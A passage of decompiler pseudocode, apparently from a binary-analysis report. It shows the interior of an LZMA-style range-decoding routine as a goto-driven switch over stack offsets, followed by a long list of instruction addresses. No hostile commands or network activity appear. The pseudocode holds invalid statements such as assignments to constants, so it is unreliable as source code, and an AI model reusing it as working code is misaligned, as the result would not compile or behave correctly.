                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x28);
                          											goto L88;
                          										case 0xb:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L88:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L89:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L99:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t334 = __ebp - 0x70;
                          											 *_t334 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t334;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L101;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												goto L58;
                          											}
                          										case 0x10:
                          											L109:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t365 = __ebp - 0x70;
                          											 *_t365 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t365;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L111;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											while(1) {
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											}
                          										case 0x12:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 0x58);
                          												 *(__ebp - 0x84) = 0x13;
                          												__esi =  *(__ebp - 0x58) + 2;
                          												while(1) {
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											__eflags = __eax;
                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                          											goto L130;
                          										case 0x13:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												L144:
                          												 *(__ebp - 0x7c) = 0x14;
                          												goto L145;
                          											}
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											L130:
                          											 *(__ebp - 0x58) = __eax;
                          											 *(__ebp - 0x40) = 3;
                          											goto L144;
                          										case 0x14:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											 *(_t613 - 0x88) = _t533;
                          											goto L1;
                          										case 0x15:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L120;
                          										case 0x16:
                          											__eax =  *(__ebp - 0x30);
                          											__eflags = __eax - 4;
                          											if(__eax >= 4) {
                          												_push(3);
                          												_pop(__eax);
                          											}
                          											__ecx =  *(__ebp - 4);
                          											 *(__ebp - 0x40) = 6;
                          											__eax = __eax << 7;
                          											 *(__ebp - 0x7c) = 0x19;
                          											 *(__ebp - 0x58) = __eax;
                          											goto L145;
                          										case 0x17:
                          											L145:
                          											__eax =  *(__ebp - 0x40);
                          											 *(__ebp - 0x50) = 1;
                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          											goto L149;
                          										case 0x18:
                          											L146:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												 *(__ebp - 0x88) = 0x18;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t484 = __ebp - 0x70;
                          											 *_t484 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t484;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L148:
                          											_t487 = __ebp - 0x48;
                          											 *_t487 =  *(__ebp - 0x48) - 1;
                          											__eflags =  *_t487;
                          											L149:
                          											__eflags =  *(__ebp - 0x48);
                          											if( *(__ebp - 0x48) <= 0) {
                          												__ecx =  *(__ebp - 0x40);
                          												__ebx =  *(__ebp - 0x50);
                          												0 = 1;
                          												__eax = 1 << __cl;
                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          												__eax =  *(__ebp - 0x7c);
                          												 *(__ebp - 0x44) = __ebx;
                          												while(1) {
                          													 *(_t613 - 0x88) = _t533;
                          													goto L1;
                          												}
                          											}
                          											__eax =  *(__ebp - 0x50);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          											__eax =  *(__ebp - 0x58);
                          											__esi = __edx + __eax;
                          											 *(__ebp - 0x54) = __esi;
                          											__ax =  *__esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												__cx = __ax >> 5;
                          												__eax = __eax - __ecx;
                          												__edx = __edx + 1;
                          												__eflags = __edx;
                          												 *__esi = __ax;
                          												 *(__ebp - 0x50) = __edx;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L148;
                          											} else {
                          												goto L146;
                          											}
                          										case 0x19:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												 *(__ebp - 0x2c) = __ebx;
                          												L119:
                          												_t393 = __ebp - 0x2c;
                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t393;
                          												L120:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t400 = __ebp - 0x60;
                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t400;
                          												goto L123;
                          											}
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L102:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L108:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L112:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														_t391 = __ebp - 0x2c;
                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t391;
                          														goto L119;
                          													}
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L111:
                          														_t368 = __ebp - 0x48;
                          														 *_t368 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t368;
                          														goto L112;
                          													} else {
                          														goto L109;
                          													}
                          												}
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L101:
                          													_t338 = __ebp - 0x48;
                          													 *_t338 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t338;
                          													goto L102;
                          												} else {
                          													goto L99;
                          												}
                          											}
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L108;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L79;
                          										case 0x1b:
                          											L75:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t274 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t274;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t283 = __ebp - 0x64;
                          											 *_t283 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t283;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L79:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L80;
                          										case 0x1c:
                          											while(1) {
                          												L123:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t414 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t414;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t414;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L80:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											 *(__ebp - 0x88) = 0x1c;
                          											goto L170;
                          									}
                          								}
                          								L171:
                          								_t535 = _t534 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          					}
                          				}
                          			}













                          0x00000000
                          0x00406355
                          0x00406355
                          0x00406359
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x00406364
                          0x00406371
                          0x00406374
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x004066b8
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
